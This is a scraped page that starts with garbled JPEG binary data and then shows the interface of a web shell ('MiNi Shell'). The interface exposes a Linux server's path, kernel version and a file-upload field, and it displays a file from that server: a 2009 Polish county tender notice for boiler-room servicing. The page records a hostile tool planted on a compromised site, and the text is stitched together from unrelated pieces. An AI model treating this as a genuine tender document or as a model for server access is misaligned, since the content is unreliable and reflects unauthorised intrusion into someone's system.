JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090929/165647-N-2009.html

<p class="kh_header"><b>Sochaczew: Prowadzenie serwisu eksploatacyjnego kotłowni olejowych w jednostkach organizacyjnych Powiatu Sochaczewskiego w latach 2009 - 2010</b><br>
<b>Numer ogłoszenia: 165647 - 2009; data zamieszczenia: 29.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Sochaczewski reprezentowany przez Zarząd Powiatu , ul. Marszałka J. Piłsudskiego 65, 96-500 Sochaczew, woj. mazowieckie, tel. 046 8641840 lub 73, faks 046 8641871.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.sochaczew.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie serwisu eksploatacyjnego kotłowni olejowych w jednostkach organizacyjnych Powiatu Sochaczewskiego w latach 2009 - 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie serwisu eksploatacyjnego kotłowni olejowych w jednostkach organizacyjnych Powiatu Sochaczewskiego w latach 2009 - 2010. 
W ramach prowadzonego serwisu eksploatacyjnego kotłowni wykonywane będą następujące prace:
1.	Przegląd główny przeprowadzony raz w czasie trwania umowy. W ramach przeglądu głównego wykonane będą następujące czynności:                                
1)	czyszczenie kotłów,
2)	sprawdzenie szczelności połączeń instalacji kotłowni,
3)	sprawdzenie działania urządzeń zabezpieczających przed przekroczeniem, dopuszczalnej temperatury i ciśnienia,
4)	sprawdzenie i regulacja automatyki,
5)	sprawdzenie działania układu zabezpieczenia przed zbyt niską temperaturą powrotu,
6)	czyszczenie i regulacja palników, 
7)	sprawdzenie działania wentylacji nawiewno - wywiewnej kotłowni,
8)	sprawdzenie szczelności przewodów odprowadzających spaliny do komina,
9)	sprawdzenie szczelności instalacji  drogi olejowej  palnika, 
10)	sprawdzenie i regulacja pozostałych urządzeń  objętych serwisem.
2.	Przeglądy kontrolne prowadzone raz w miesiącu. W ramach przeglądu kontrolnego przeprowadzone będą następujące czynności:
1)	sprawdzenie ciśnienia w instalacji,
2)	sprawdzenie działania zaworu bezpieczeństwa,
3)	sprawdzenie i regulacja nastaw urządzeń regulacyjnych,
4)	przeprowadzanie regulacji nastaw automatyki w przypadku zmiany,
5)	parametrów użytkowych kotłowni, 
6)	sprawdzenie szczelności instalacji kotłowni,
7)	sprawdzenie działania wentylacji nawiewno - wywiewnej kotłowni,
8)	usunięcie istniejących nieprawidłowości w działaniu sprawdzanych urządzeń.
9)	wymiana części i materiałów zużywających się w czasie eksploatacji,
10)	korekta nastaw palników potwierdzona wydrukiem analizy spalin,
11)	spisywanie liczników godzin pracy poszczególnych kotłów wyposażonych fabrycznie w takie liczniki i na tej podstawie określenie przybliżonego zużycia oleju opałowego, oraz przekazanie tych danych w formie protokółu Zleceniodawcy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 50.72.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca wniesie wadium w wysokości i na zasadach określonych w niniejszym rozdziale SIWZ. 
Termin wniesienia wadium: do terminu składania ofert - do 7 października 2009 roku do godz. 11.00.
Wadium wynosi: 1.000,00 PLN (słownie: tysiąc złotych).
Wadium może być wnoszone w:

	1)	pieniądzu;
	2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
	3)	gwarancjach bankowych;
	4)	gwarancjach ubezpieczeniowych;
	5)	poręczeniach udzielanych przez podmioty, o których mowa w art.6 ust.3 pkt.4 lit.b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824). 
Wadium można wnieść w pieniądzu - przelewem na konto Zamawiającego.        
Nr konta: 81 9283 0006 0011 2732 2000 0010 w Banku Spółdzielczym w Sochaczewie, ul. Reymonta 18 (decyduje data wpływu na konto Zamawiającego). 
Wadium wniesione w innej formie, niż gotówkowej, należy zdeponować u Skarbnika Powiatu w pokoju nr 1 w Starostwie Powiatowym w Sochaczewie przy ul. M. J. Piłsudskiego 65, w terminie jak wyżej.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienie mogą ubiegać się Wykonawcy, którzy spełnią następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień, tj.:
Ocena spełniania warunku zostanie dokonana na podstawie złożonego z ofertą: 
- oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 Ustawy;
2)	posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
a)	W ciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują usługi odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia, tj. dotyczące konserwacji systemów grzewczych o wartości łącznej równej co najmniej cenie ofertowej (potwierdzone stosownym dokumentem, że zostały wykonane należycie - tzw. referencjami);
b)	Dysponują osobami zdolnymi do realizacji zamówienia.
Ocena spełniania warunku zostanie dokonana na podstawie złożonych z ofertą: 
- wykazu zawierającego wykonane lub wykonywane, w okresie ostatnich trzech lat, przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednego zamówienia polegającego na konserwacji systemów grzewczych; 
- dokumentów potwierdzających, że zamówienia wymienione w wykazie zamówień, o którym mowa w punkcie poprzednim, zostały wykonane / są wykonywane z należytą starannością, wystawionych przez podmioty na rzecz których zamówienia zostały wykonane/są wykonywane; 
- wykazu osób, które będą świadczyć usługę wraz z informacjami na temat ich kwalifikacji zawodowych, a także zakresu wykonywanych przez nich czynności; 
- oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 Ustawy;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:
a)	Posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej - na kwotę minimum 100.000 złotych brutto. 
Ocena spełniania warunku nastąpi na podstawie złożonych z ofertą: 
- aktualnej polisy lub innego dokumentu ubezpieczenia potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100.000 złotych brutto; 
- oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 Ustawy;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
Ocena spełniania warunku nastąpi na podstawie złożonych z ofertą: 
- aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
- oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 Ustawy. 

2. Ocena spełnienia warunków w postępowaniu o zamówienie publiczne odbywać się będzie poprzez sprawdzenie oferty i określenie spełnienia wymogów formalnych oraz żądanych od Wykonawców oświadczeń i dokumentów poprzez ocenę spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oferta, której treść winna odpowiadać treści formularza oferty stanowiącego załącznik nr 1 do SIWZ; 
2.	Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o którym mowa w art.44 Ustawy, którego treść winna odpowiadać treści wzoru oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art.22 ust.1 Ustawy, stanowiącego załącznik nr 2 do SIWZ;
3.	Wykaz zawierający wykonane lub wykonywane, w okresie ostatnich trzech lat, przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedno zamówienie polegające na konserwacji systemów grzewczych;
4.	Dokumenty potwierdzające, że zamówienia wymienione w wykazie zamówień, o którym mowa w pkt.3), zostały wykonane/są wykonywane z należytą starannością, wystawione przez podmioty na rzecz których zamówienia zostały wykonane/są wykonywane (Dokumenty potwierdzające należyte wykonanie/wykonywanie zamówienia muszą zawierać następujące informacje: Nazwę Wykonawcy, Nazwę podmiotu na rzecz, którego zamówienie zostało wykonane/jest wykonywane, Potwierdzenie należytego wykonania/wykonywania zamówienia); 
5.	Wykaz osób, które będą świadczyć usługę, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności;
6.	Aktualna polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100.000 złotych brutto;
7.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
8.	W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
1)	oświadczenie wymienione w ust.1 w zakresie: 
- warunków określonych w art.22 ust.1, pkt.1), 2) i 3) Ustawy, wszyscy Wykonawcy mogą złożyć wspólnie,
- warunków określonych w art.22 ust.1, pkt.4) Ustawy, Wykonawcy muszą złożyć indywidualnie. 
2)	dokumenty wymienione w ust.1 punkty od 3) do 7) mogą być złożone przez wszystkich Wykonawców wspólnie,
3)	dokumenty wymienione w ust.1 punkty od 8) do 12) muszą być złożone przez każdego z Wykonawców składających ofertę indywidualnie. 
9.	Pełnomocnictwa - w przypadku, gdy ofertę podpisuje(ą) osoba inna niż wymieniona w odpisie z właściwego rejestru, zaświadczeniu o wpisie do ewidencji działalności gospodarczej lub innym dokumencie wskazującym sposób reprezentacji Wykonawcy. 
Pełnomocnictwo winno być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez udzielającego pełnomocnictwa albo przez notariusza. Załączone pełnomocnictwo musi wskazywać pełnomocnika oraz zakres umocowania pełnomocnika. 
Jeżeli dalsze pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego będzie udzielone przez pełnomocnika Wykonawcy, należy załączyć (forma jak wyżej) również dalsze pełnomocnictwo. 
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej składa dokumenty wymienione w § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 roku w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 87, poz.605)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://sochaczew-powiat.bip.org.pl/?tree=przetarg.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sochaczewie
ul. M. J. Piłsudskiego 65
96 - 500 Sochaczew.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2009 godzina 11:00, miejsce: Starostwo Powiatowe w Sochaczewie
ul. M. J. Piłsudskiego 65
96 - 500 Sochaczew
Pokój Nr 214 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com